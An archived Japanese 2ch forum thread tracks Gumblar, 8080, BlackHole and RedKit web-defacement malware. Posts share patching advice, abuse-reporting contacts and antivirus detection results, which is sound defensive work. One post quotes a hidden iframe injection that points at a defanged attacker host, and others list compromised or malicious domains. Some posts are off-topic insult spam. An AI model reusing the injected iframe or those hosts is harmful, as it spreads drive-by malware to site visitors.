2013年17セキュリティ105: 【Gumblar/GENO】Web改竄ウイルス総合11【8080】 (335)
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▼
Win XPのファイアーウォール (872)
【中華キー】NortonInternetSecurity Part2【専用】 (546)
◇Avira Internet Security 2013 Part.1◇ (248)
Process Explorerってどうよ? (931)
スパイウェア削除ソフト Spybot Part61 (517)
【AA】avast!Anti-Virus Part131【きゅい!お断り】 (621)
【Gumblar/GENO】Web改竄ウイルス総合11【8080】
1 :2012/08/14 〜 最終レス :2013/09/14 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです 感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします 一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください 基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう *** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください *** *** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します *** 前スレ 【Gumblar/GENO】Web改竄ウイルス総合10【8080】 http://kohada.2ch.net/test/read.cgi/sec/1279692828/
2 : Gumblar(.x)、8080系ウイルス対処法。 行っておくべき事項を箇条書きにしました。 細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。 (1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする (2)Adobe Readerを最新版に更新する (3) Adobe ReaderのAcrobat JavaScriptを無効に設定 (4) JRE(Java Runtime Environment)を最新版に更新する (5) Flash Playerを最新版に更新する (6) QuickTimeを最新版に更新する (1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。 攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。 Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。 Acrobat JavaScriptを無効にする方法は以下の通り。 (1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択 (2)「分類」の中の「JavaScript」を選択 (3)「Acrobat JavaScriptを使用」のチェックをクリア (4)「OK」ボタンを押す ※サイトを運営されている方は、さらに次のことも実施していただきたい。 (1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する (2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、 ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3 : 【脆弱性を利用されやすいソフトウェア】 下記については必ずアップデートしてください 使用していないものはアンインストール推奨です ■ Windows XPは可能ならば新しいOSに ■ Windows Update / Microsoft Updateを更新 ・XP以下は念のためMicrosoft Updateに変更してアップデートする ■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール) ttp://get.adobe.com/jp/reader/ ・インストール後本体をアップデート ヘルプ → アップデートの有無をチェック ・Acrobat Javascriptをオフにする 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す ■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!) ttp://get.adobe.com/jp/flashplayer/ ttp://www.adobe.com/jp/shockwave/download/alternates/#fp ・Flash Playerのバージョン確認 ttp://www.adobe.com/jp/software/flash/about/ ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm ■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール) ttp://www.adobe.com/jp/shockwave/download/alternates/#sp ■ Java Runtime Environmentを更新 (Javascriptとは違うので注意) ttp://www.java.com/ja/ ・Javaのバージョン確認 ttp://www.java.com/ja/download/installed.jsp ■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール) ttp://www.apple.com/jp/quicktime/download/ ■ RealPlayerを更新 (使っていないならアンインストール) ttp://jp.real.com/?mode=basic
4 : ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨) ※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります ●InternetExplorer ツール→インターネットオプション→セキュリティ→ レベルのカスタマイズ→スクリプトのとこ全部無効にチェック ※ActiveXもOFF ●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す ●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す ●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→ デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す ●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す ※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション もしくはLunascape5を使うといいようです。 ●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5 : ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。 【改ざんサイトの調査など】 ■ チェッカーサイト ・gredでチェック ttp://www.gred.jp/ ・aguse ttp://www.aguse.net/ ・WebGetter ttp://rd.or.tp/get.php ・Dan's View Source ttp://www.dan.co.uk/viewsource/ ・飛び先のチェック by ぴょん基地の友達 ttp://www.kakiko.com/check/sample.html
6 : 改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。 ■インシデント報告の届出(JPCERT/CC) https://www.jpcert.or.jp/form/ サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。 以下、代表的なサーバー管理会社 デジロック https://www.value-domain.com/webabuse.php OCN http://www.ocn.ne.jp/info/rules/abuse/ さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml ロリポップ https://lolipop.jp/support/inq/ GMOインターネットグループ https://secure.gmo.jp/contact/ インフォシーク (isweb) http://portal.faq.rakuten.co.jp/ DION http://www.auone-net.jp/security/knowledge/navi/index.html NTTPCコミュニケーションズ http://www.nttpc.ne.jp/ ODN https://www.odn.ne.jp/support/question/input_netabuse.html xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php heteml ヘテムル https://secure.heteml.jp/support/inquiry/ ファーストサーバ http://www.firstserver.co.jp/contact/index.html エキサイト http://www.excite.co.jp/help/support
7 : 改竄を受けたら ウイルス・不正アクセス届出状況について(3月分および第1四半期) http://www.ipa.go.jp/security/txt/2010/04outline.html (3)ウェブサイト改ざんの被害発生時の対処 ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。 被害の拡大を防ぐために、次に示すような対応が求められます。 ▼まず初めに行うべきこと まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。 このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。 同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。 ▼改ざん箇所の洗い出し等の調査 上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。 また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。 また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。 ▼ウェブサイトを再公開する場合 上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。 ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。 改ざんの事実の説明 ・ 改ざんされていた箇所 ・ 改ざんされていた期間 ・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明 ・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など) ・ 問い合わせ用窓口の連絡先 IPAに不正アクセスの届出 http://www.ipa.go.jp/security/ciadr/index.html
8 : ■ 専ブラで右クリからの検索を有効にする方法。 設定例:JaneView 設定>基本>機能>コマンド欄で コマンド名 任意の名前 実行するコマンドに 任意のURL を記載して追加。終わったら「よろし」をクリック。 これで設定完了。 http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html これで専ブラから検索でチェックできるようになります。 以下がそのコマンドの一例になります。 aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK 飛び先のチェック=http://www.kakiko.com/check/?$LINK WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
9 : >>8 WebGetterのドメインが変更になったもよう。 rd.or.tp → rd.or.tl
10 : .
11 : そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね そ・う・か 氏・ね
12 : 天麩羅以外殆どレスがついてないな。平穏で何より。
13 : さらみ復帰かきこ
14 : 「Adobe Reader」の「サンドボックス」を回避する脆弱性はなぜ危険か(トレンドマイクロ) scan.netsecurity.ne.jp/article/2012/11/28/30520.html >このエクスプロイトは、JavaScriptがソフトウェア上で無効になっている場合でも実行される。 >ユーザが必要とされる唯一のやりとりは、PDFファイルを開き、Webブラウザを閉じるだけで、 >それだけで脆弱性が悪用される。
15 : 「ITSOKNOPROBLEMBRO」 It's OK no problem bro. 「bro」って、なんじゃろ?
16 : JPドメイン Web改竄速報 tp://izumino.jp/Security/def_jp.html
17 : いろんなCMSがあるのね ぱっと見、Joomla! 1.5が多いなん 「Joomla!」ってのはLTSが2.5で、まいなうpだてJoomla! 2.5.8になってるね トップページにMETA HTTP-EQUIV="Refresh"〜仕込まれてるとこがあるる こりは故意にやってるのかどーかわかんね どーすべさ
18 : >< ; > このメールにはご注意ください。送信者のアカウントが不正に使用されている可能性があるため、このメールは個人情報を騙し取ろうとする詐欺である可能性があります。 ぁぅぁぅぁー 検体8080を送ったら、ベンダーからの返信がみーんなこーなってた… って、ことは改竄サイトのホスティングにはつーほーめる届いてないかもん
19 : [Google セーフ ブラウジング診断ページ: microad.jp] http://www.google.com/safebrowsing/diagnostic?site=microad.jp/ microad.jp は、過去 90 日間に 21 個のサイト(www34.atwiki.jp/no1mixisagi/, www16.atwiki.jp/godeaterburst-wiki/, soccer-douga.com/ など)への感染媒体となっていた形跡があります。
20 : RedKit Redirector Injected into Legitimate JavaScript Code | Xanda's Blog !~! http://blog.xanda.org/2013/02/15/redkit-redirector-injected-into-legitimate-javascript-code/ マルウエア被害の実例と対策について || Joomla日本語コラム http://www.joomla.jpn.com/joomla/column/joomlacolumn/1083-vol189.html マカフィー株式会社 | McAfee Blog - 最新のエクスプロイトキット、Red Kit http://www.mcafee.com/japan/security/mcafee_labs/blog/content.asp?id=1351 CMS以外のサイトもパパンがパンデミック こうしてる合間にもまかひはEXTRA.DATを生産中 ひげおじさんもあびらもまいくろそふともがむばってます
21 : RedKitリダイレクターけっこう多いよね (´ω`) RedKit設置されてるサーバー ぜんぶ正規のサイトだもんだからイヤラシイことこの上ない
22 : ESET参戦 > Dear ○○, > > Thank you for your submission. > The detection for this threat will be included in our next signature update. > > *********_ahhd.htm_i.txt - JS/Exploit.Agent.NEN trojan > *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan > *********_987.pdf.txt - JS/Exploit.Pdfka.QED trojan > > Regards, > > ESET Malware Response Team >>21 もうね、どーしよーもにゃー 検体送付とつーほーがワンセット サンセット イーセット (-Д-) サムイネェ
23 : >>20 > Hello, > > The files sent to us could be allocated to the following malware families: > > - EXP/Pidief.dtd > - JS/Dldr.Agent.ahi > > The detections and repair routines of the malware samples will be available prospective with one of next update of the VDF. > > Best regards, > Avira Sdn Bhd うほ
24 : >>20 のマカフィーが説明しているRedKitの中間Scriptが単純化したのを確認すた。。。しかも相対パスだぼ 現状、呼び出されるjar(exe)で検出されるのを待つしかにゃー jar(exe)の進捗状況 Detection ratio: 6 / 45 Analysis date: 2013-03-14 12:13:28 UTC ↓ Detection ratio: 11 / 45 Analysis date: 2013-03-14 18:21:34 UTC Analysis Antivirus Result Update DrWeb Trojan.DownLoader8.5817 20130314 Emsisoft Trojan.Win32.Agent.AMN (A) 20130314 Fortinet W32/Yakes.B!tr 20130314 Ikarus Trojan-Downloader.Win32.Karagany 20130314 Kaspersky UDS:DangerousObject.Multi.Generic 20130314 Malwarebytes Trojan.Agent.BVGen 20130314 McAfee PWS-FAQO!C7C63B63204E 20130314 Panda Suspicious file 20130314 TheHacker Posible_Worm32 20130314 TrendMicro PAK_Generic.001 20130314 TrendMicro-HouseCall TROJ_GEN.RC1H1CE 20130314 検出できないかもしれない中間Scriptとjar(exe)をメルで送れるベンダーに検体提出しました。
25 : 国内Webサーバの大規模改ざん発生中。アクセスすると別サイトから自動的にマルウェアダウンロード http://engawa.2ch.net/test/read.cgi/poverty/1363534745/
26 : 国内Webサーバの大規模改ざん発生age
27 : 【社会】環境省サイトが改ざんされる…閲覧者がウイルス感染する危険も uni.2ch.net/test/read.cgi/newsplus/1363506806/ 環境省に聞いてみました 改ざんされてると分かったのはなぜ? ゼロデイ・ジャパン(0day.jp) | セキュリティ&マルウェア研究所 0day.jp/ ↑ ここで告知されていたからとのこと
28 : 924 :名無しさん@お腹いっぱい。:2013/03/18(月) 16:11:10.81 環境省サイト改ざんウイルス https://www.virustotal.com/ja/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/1363349552/ https://www.virustotal.com/ja/file/a1bf517e91726f5e5dd57640b35e7bd4fc203ad843bbc7cdc472004a8d644933/analysis/1363559122/
29 : ■NSX GT-ONE GT-ROM.NET www●gt-rom●net/ >このサイトはコンピュータに損害を与える可能性があります。
30 : >>24 EXEのダウンロードパスが固定数値からランダム数値に切り替わってるね xxxx.htm yyy.jar ??.html ← EXEが入手できん! (´ω`) >>29 改竄されてて 最終的にCridexというマルウェアの感染となーる
31 : ぅほっ 一日見ない間になんかすごいことに >>25-28 リストが多くて挫折したのさ。。。orz.... >>29 アッー >>30 やっぱランダムだたのね >24以後、DLできなくなたー 決め打ちもできんくなたー
32 : 感染サイト一覧 unixfreaxjp.blogspot.jp/2013/03/ocjp-098-285blackhole-exploit-kit.html つまり、周知キャンペーンw
33 : <愛国者とネトウヨの11の違い> 理路整然と意見を話すのが愛国者 出所不明な怪文書を貼るのがネトウヨ 有識で周りの評価が高いのが愛国者 無職でプライドだけ高いのがネトウヨ 日本人である事を誇りに思うのが愛国者 日本人である事だけが誇りなのがネトウヨ 討論で相手の愛国度をはかるのが愛国者 討論で相手を売国奴扱いするのがネトウヨ 君が代をきちんと歌えるのが愛国者 気味が悪いほどネットで吠えるのがネトウヨ 家族思いなのが愛国者 家族の重荷になっているのがネトウヨ 社会に出て一人前なのが愛国者 2ちゃんねるでだけ一人前なのがネトウヨ 日本の歴史と政治に学が深いのが愛国者 2ちゃんの書き込みとレスが不快なのがネトウヨ 日本人が逮捕されると残念だと嘆くのが愛国者 日本人が逮捕されると通名だとわめくのがネトウヨ 日本の事を敬虔(けいけん)に思っているのが愛国者 自分の事を聖戦士だと思っているのがネトウヨ 投票で清き一票を入れるのが愛国者 妄想でキモい文章を作るのがネトウヨ
34 : 私は 一庶民 カスミソウの様に 密やかに
35 : >29 VTで検出されるよーになたー 難読化されたScript BitDefender JS:Trojan.Crypt.MF F-Secure JS:Trojan.Crypt.MF GData JS:Trojan.Crypt.MF Ikarus Exploit.JS.Blacole MicroWorld-eScan JS:Trojan.Crypt.MF nProtect JS:Trojan.Crypt.MF 呼び先のphp Microsoft Exploit:JS/Blacole.GB Sophos Mal/ExpJS-N こっからさきはRんかった ESETとひげおぢさんからめる ESET JS/Kryptik.AII trojan JS/Kryptik.AIK trojan JS/Exploit.Agent.NEO trojan ひげおぢさん Trojan-Downloader.JS.DarDuk.lb CsideNet様から受領のお返事来てました。 VTとかが反応してきたので対応されるかと思ふぽ 頻繁に更新してるようですが ドメインがSPAM扱いされてるようになったみたいで、検体メルで送り辛い ><;
36 : あげ
37 : あびらからもきてた>35 JS/Expy.B〜F
38 : >>35 乙でし。 >Last-Modified: Tue, 19 Mar 2013 12:42:23 GMT >Last-Modified: Tue, 19 Mar 2013 13:27:15 GMT 凄い勢いで更新? ※電話がボボンで代行依頼 orz ありがとう代行さん...
39 : >>38 お疲れ様です 4種類ぐらいのScriptが繰り返し交互に変わっているようです happy-lemon、apmsolucionesweb、speciaalaangepast、vedelaar んでそれぞれさらに違うとこへ誘導 ipodのとこには古い8080が(ry
40 : ぼぼん解除てすt
41 : >>24 のRedKitの中間Scriptが難読化した 現状まかひのみ対応 File type: HTML Detection ratio: 2 / 46 McAfee Exploit-Rekit.f 20130402 McAfee-GW-Edition Exploit-Rekit.f 20130402
42 : Exploit Kit が設置されてたはずのサイトへ逝ってみた トップページには > Hacked By CompLeXx* & XIX ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
43 : Trojan-Downloader.Win32.Karagany 新KwバルスECM: 90 34 00 00 21 00 17 02 0d ee 0c 56 5d 8a 9a 88 20 3c 69 26 e0 70 c0 dc 5c 04 15 de c8 a2 9f 0d be 5a 1b d8 e1 98 00 timeta70bledeva.rr.nu https://www.virustotal.com/ja/url/ad520632542fa49f1a301af12c75b47925bedccc5f7964872dfbdc4b7938a52c/analysis/1364931178/ Mal/HTMLGen-A n8vlzd5e9h.diipl.com https://www.virustotal.com/ja/url/ed70555e53241290b281985d0988ca0f8e8f898ee5d465f817ae966d0c124752/analysis/1364931361/ Mal/HTMLGen-A https://www.virustotal.com/ja/url/a03758a568622c159348ce323beb9085367ed71afde257162b10a40528cb7007/analysis/1364931554/ ESET Malware site Google Safebrowsing Malware site
44 : Google セーフ ブラウジング このサイトは危険にさらされている可能性があります http://www.stopforumspam. com/ipcheck/ http://support.google.com/websearch/answer/190597?hl=ja
45 : BlackHole Exploit Kit Redirectorだと思うけど ランダムにExploit Kitサイトや金融系っぽいサイトに飛ばされるので新手のフィッシングかと思ってたら 自分でも知ってるbloombergにも逝っちゃた どうやらノーマルなサイトと混ぜて飛ばされるみたい 金融系の末尾あたりに付く「LBTG」ってなんじゃろか? 株価チャートのことかなん
46 : >>45 の亜種 ひげおぢさんから自動お返事の件名「[!!Spam KSE]Re: 〜」 途中誘導されてるとこの一つのアドレスが薬物(Viagra等)販売サイトなのでこーなった… 他のベンダーに届いているのか心配 >>45 との共通点 :タグの文字列 :難読Script デコードめんどいからaguse最高(´∇`) gredでも確認でけるYO :誘導先に金融系サイトが混ざっている模様。恐らく検出逃れかと
47 : >>45 BitDefender Trojan.JS.Iframe.DDE 20130415 Emsisoft Trojan.JS.Iframe.DDE (B) 20130415 F-Secure Trojan.JS.Iframe.DDE 20130415 GData Trojan.JS.Iframe.DDE 20130415
48 : >>45 別件だけど関連 http://kohada.2ch.net/test/read.cgi/sec/1160377080/822
49 : >>47 Antivirus Result Update BitDefender Trojan.JS.Iframe.DDE 20130415 DrWeb JS.IFrame.418 20130415 Emsisoft Trojan.JS.Iframe.DDE (B) 20130415 F-Secure Trojan.JS.Iframe.DDE 20130415 GData Trojan.JS.Iframe.DDE 20130415 Ikarus Trojan.JS.IFrame 20130415 Microsoft Trojan:JS/BlacoleRef.DD 20130415 MicroWorld-eScan Trojan.JS.Iframe.DDE 20130415 nProtect Trojan.JS.Iframe.DDE 20130415 TrendMicro-HouseCall TROJ_GEN.F47V0415 20130415 これくらい検出されれば、改竄されたことに気付くかなん
50 : >>46 BitDefender Trojan.Script.CDK 20130416 Commtouch JS/IFrame.RS 20130416 DrWeb JS.IFrame.418 20130416 Emsisoft Trojan.Script.CDK (B) 20130416 F-Prot JS/IFrame.RS 20130416 F-Secure Trojan.Script.CDK 20130416 GData Trojan.Script.CDK 20130416 Microsoft Trojan:JS/BlacoleRef.CZ 20130416 MicroWorld-eScan Trojan.Script.CDK 20130416 nProtect Trojan.Script.CDK 20130416 Sophos Mal/Iframe-AO 20130416 TrendMicro-HouseCall TROJ_GEN.F47V0414 20130416
51 : >>49 Avira JS/Iframe.CI HTML/Iframe.CN JS/Iframe.CL
52 : >>45 また変わった パパンがパンデミック DrWeb JS.IFrame.418 20130416 Microsoft Trojan:JS/BlacoleRef.DD 20130416 Norman Blacole.TB 20130416 中間Script McAfee Exploit-Rekit.f 20130416 Norman RedKit.B 20130416 Microsoft Trojan:JS/BlacoleRef.DD 20130416 Norman Blacole.TB 20130416 BlackHoleもRedKitも同じ中間Scriptになったのかな? > Norman
53 : >>52 増えた BitDefender Trojan.JS.Agent.IYS 20130417 Commtouch JS/IFrame.RS.gen 20130417 DrWeb JS.IFrame.418 20130417 Emsisoft Trojan.JS.Agent.IYS (B) 20130417 F-Prot JS/IFrame.RS.gen 20130417 F-Secure Trojan.JS.Agent.IYS 20130417 GData Trojan.JS.Agent.IYS 20130417 Ikarus Trojan.JS.BlacoleRef 20130417 McAfee JS/Blacole-Redirect.aa 20130417 Microsoft Trojan:JS/BlacoleRef.DD 20130417 MicroWorld-eScan Trojan.JS.Agent.IYS 20130417 Norman Blacole.TB 20130417 nProtect Trojan.JS.Agent.IYS 20130417 TrendMicro-HouseCall TROJ_GEN.F47V0416 20130417 確認できてから三度改竄されてるけど どんなセキュリティソフト使ってんだろ? Fxやちょろめ、ぐぐるを使わないんだろか? 孫やほーだと警告でにゃーし とっくの昔に直接めるしてるし NTTPCコミュニケーションズからも通達されてるはずなんだけど。。。 ドメインがスパムとかに登録されちゃってるのかな? Wab上での機会損失関係ない企業なぬか? ついったーやってるっぽいんだけどにゃー ひょっとして蜜壷?
54 : >>53 四度目 AntiVir JS/BlacoleRef.CZ.7 20130418 Commtouch JS/IFrame.RS.gen 20130418 DrWeb JS.IFrame.418 20130418 F-Prot JS/IFrame.RS.gen 20130418 Ikarus Trojan.JS.IFrame 20130418 McAfee JS/Blacole-Redirect.aa 20130418 Microsoft Trojan:JS/BlacoleRef.DD 20130418 Norman Blacole.TB 20130417 つーほーめる届いてなくても いーかげん気付かないかなん
55 : >>54 五度目 AntiVir JS/BlacoleRef.CZ.7 20130419 BitDefender Trojan.Script.CDS 20130419 Commtouch JS/IFrame.RS.gen 20130419 DrWeb JS.IFrame.418 20130419 Emsisoft Trojan.Script.CDS (B) 20130419 F-Prot JS/IFrame.RS.gen 20130418 F-Secure Trojan.Script.CDS 20130419 GData Trojan.Script.CDS 20130419 Ikarus Trojan.JS.IFrame 20130419 McAfee JS/Blacole-Redirect.aa 20130419 McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419 Microsoft Trojan:JS/BlacoleRef.DD 20130419 MicroWorld-eScan Trojan.Script.CDS 20130419 Norman Blacole.TB 20130419 nProtect Trojan.Script.CDS 20130419 もうベンダーに送る気力がにゃい
56 : こりもころころ変わるっぽい>中間Script Sophos Troj/ExpJS-II 20130419 55ひっくるめて送った>ベンダー
57 : >>55 七度目 Detection ratio: 2 / 46 Analysis date: 2013-04-21 16:31:34 UTC Antivirus Result Update McAfee JS/Exploit-Blacole.ht 20130421 Norman Blacole.TH 20130421 六度目は>>47 >>49 とおなじものですた
58 : 中間Script >>57 久しぶりにひげおじさん登場 Detection ratio: 18 / 46 Analysis date: 2013-04-21 17:25:00 UTC Antivirus Result Update AntiVir JS/BlacoleRef.CZ.7 20130421 BitDefender Trojan.JS.Agent.IYT 20130421 Commtouch JS/IFrame.RS.gen 20130420 Comodo UnclassifiedMalware 20130421 DrWeb JS.IFrame.418 20130421 Emsisoft Trojan.JS.Agent.IYT (B) 20130421 F-Prot JS/IFrame.RS.gen 20130420 F-Secure Trojan.JS.Agent.IYT 20130421 Fortinet JS/Agent.GWA!tr.dldr 20130421 GData Trojan.JS.Agent.IYT 20130421 Ikarus Trojan.JS.IFrame 20130421 Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421 McAfee JS/Exploit-Blacole.eu 20130421 McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421 Microsoft Trojan:JS/BlacoleRef.DD 20130421 Norman Blacole.TB 20130421 nProtect Trojan.JS.Agent.IYT 20130421 TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421 単純化しちゃったのがまた出た Detection ratio: 0 / 46 Analysis date: 2013-04-21 17:15:56 UTC ねもい
59 : ( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \ スパムとかのドメインがあったもより まかひには送れない
60 : >>57 八回目… Detection ratio: 6 / 46 Analysis date: 2013-04-23 04:15:16 UTC Antivirus Result Update AntiVir JS/BlacoleRef.CZ.8 20130423 DrWeb Exploit.BlackHole.182 20130423 McAfee JS/Exploit-Blacole.ht 20130423 NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423 Norman Blacole.TH 20130422 VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
61 : > Dear *****, > > Thank you for your submission. > The detection for this threat will be included in our next signature update. > > Regards, > > ESET Malware Response Team いつもごめんよぉー 肝心の大ボス捕まえられなくて
62 : これまで蜜壷状態だったとこが正常になった模様です。 お疲れ様でした。 定点観測おはり
63 : こんな夜中にGMOの中の人が受理してくれました>インシデント ゴールデンなウィークですがお疲れ様です。 ありがとうございます。 この場を借りてお礼申し上げます。
64 : 一回目 AntiVir JS/BlacoleRef.CZ.12 20130503 Avast JS:Decode-ADH [Trj] 20130504 GData JS:Decode-ADH 20130504 McAfee JS/Exploit-Blacole.ht 20130504 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 二回目 AntiVir JS/BlacoleRef.CZ.12 20130504 Avast JS:Decode-ADH [Trj] 20130504 BitDefender Trojan.JS.Iframe.DDQ 20130504 Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504 F-Secure Trojan.JS.Iframe.DDQ 20130504 GData Trojan.JS.Iframe.DDQ 20130504 McAfee JS/Exploit-Blacole.ht 20130504 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504 nProtect Trojan.JS.Iframe.DDQ 20130504 三回目 McAfee JS/Exploit-Blacole.ht 20130505 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504 Script更新して殆どのベンダー半日もたんかった てーてんかんそくなぬか サイトの対応は早くても明後日、火曜日以降になるんだろーな
65 : >>64 > 三回目 増えた BitDefender Trojan.JS.Iframe.DDT 20130505 Comodo UnclassifiedMalware 20130505 Emsisoft Trojan.JS.Iframe.DDT (B) 20130505 F-Secure Trojan.JS.Iframe.DDT 20130505 GData Trojan.JS.Iframe.DDT 20130505 McAfee JS/Exploit-Blacole.ht 20130505 McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505 MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505 nProtect Trojan.JS.Iframe.DDT 20130505 TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
66 : 覚音山 西徳寺 www●saitoku●net/ iframe name=Twitter scrolling=auto・・・ 競馬の予想屋 keibaky●com <!--c3284d--><script>try{1-prototype;}catch・・・ two2readblog●com >不正なソフトウェアには 550 trojan(s) など wwwwwwww
67 : 上二つGMO、ばりゅどめにつーほー
68 : 別件ばぅぁー ひげおぢさん > Hello, > > New malicious software was found in the attached file. Its detection will be included in the next update. > > All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg > > Thank you for your help. >>64-65 なおた ヽ(´ー`)ノ
69 : RedKit Exploit Kit Redirector Site 某所のJSファイル AntiVir HTML/TwitScroll.B 20130508 Avast JS:Iframe-AML [Trj] 20130508 AVG HTML/Framer 20130508 BitDefender Trojan.Iframe.CBN 20130508 Commtouch IFrame.gen 20130508 Comodo TrojWare.JS.Iframe.FK 20130508 Emsisoft Trojan.Iframe.CBN (B) 20130508 ESET-NOD32 JS/Iframe.HH 20130508 F-Prot IFrame.gen 20130508 F-Secure Trojan.Iframe.CBN 20130508 Fortinet JS/Iframe.HH!tr 20130508 GData Trojan.Iframe.CBN 20130508 Ikarus Exploit.HTML.IframeRef 20130508 Kaspersky HEUR:Trojan.Script.Generic 20130508 McAfee JS/IFrame.gen.j 20130508 McAfee-GW-Edition JS/IFrame.gen.j 20130508 Microsoft Exploit:HTML/IframeRef.DM 20130508 MicroWorld-eScan Trojan.Iframe.CBN 20130508 NANO-Antivirus Trojan.Html.TwitScroll.bklyhq 20130508 Norman Iframe.UW 20130508 nProtect Trojan.Iframe.CBN 20130508 PCTools Trojan.Webkit 20130508 Sophos Troj/Iframe-JG 20130508 Symantec Trojan.Webkit!html 20130508 VIPRE Malware.JS.Generic (JS) 20130508 おしんさん、がむばって
70 : 改竄サイトをホスティングにつーほーしてるなまかへ ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
71 : BlackHole Exploit Kit Redirector Siteの新種のScript File type: HTML Detection ratio: 1 / 46 Analysis date: 2013-05-11 18:18:17 UTC Antivirus Result Update Norman BlacoleRef.BA 20130511 んで、飛び先のひとつ File type: HTML Detection ratio: 6 / 46 Analysis date: 2013-05-11 18:39:21 UTC Antivirus Result Update BitDefender Trojan.Html.Fakealert.P 20130511 Emsisoft Trojan.Html.Fakealert.P (B) 20130511 F-Secure Trojan.Html.Fakealert.P 20130511 GData Trojan.Html.Fakealert.P 20130511 MicroWorld-eScan Trojan.Html.Fakealert.P 20130511 nProtect Trojan.Html.Fakealert.P 20130510 ESETもどきに連れてかれたん
72 : apple-hikkoshi●co●jp/ 403、404が改竄されとるんw ishigo●sytes●net ※電凸済み
73 : >>72 コード <!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
74 : >>72 修正を確認すた…
